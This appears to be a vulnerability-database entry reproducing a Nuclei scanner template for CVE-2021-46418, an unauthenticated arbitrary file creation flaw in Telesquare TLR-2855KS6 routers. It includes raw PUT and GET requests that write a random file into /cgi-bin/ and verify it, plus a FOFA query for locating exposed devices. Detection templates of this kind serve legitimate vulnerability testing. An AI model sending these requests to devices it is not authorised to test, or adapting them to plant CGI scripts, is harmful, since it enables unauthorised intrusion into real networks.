漏洞描述
An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.
CVE-2021-46418: Telesquare TLR-2855KS6 - Arbitrary File Creation
PoC代码[已公开]
id: CVE-2021-46418
info:
name: Telesquare TLR-2855KS6 - Arbitrary File Creation
author: DhiyaneshDK
severity: high
description: |
An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.
reference:
- http://packetstormsecurity.com/files/166674/Telesquare-TLR-2855KS6-Arbitrary-File-Creation.html
- https://github.com/ARPSyndicate/cvemon
- https://nvd.nist.gov/vuln/detail/CVE-2021-46418
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2021-46418
epss-score: 0.63051
epss-percentile: 0.98343
cpe: cpe:2.3:h:telesquare:tlr-2855ks6:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: telesquare
product: "tlr-2855ks6"
fofa-query: "product==\"TELESQUARE-TLR-2855KS6\""
tags: packetstorm,cve,cve2021,telesquare,intrusive
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
PUT /cgi-bin/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
{{randstr}}
- |
GET /cgi-bin/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 201'
- 'contains(server_1, "lighttpd") && contains(content_type_2, "text/plain")'
- 'contains(body_2, "{{randstr}}")'
condition: and
# digest: 4b0a004830460221008f27b743417ebab3b7e4b7f049f134cf7eafb0ff53582736d00bebee26e8689a022100fef2717f252db306fae1404a30a166961ff213a573663be9b6684cebcf04a741:922c64590222798bb761d5b6d8e72950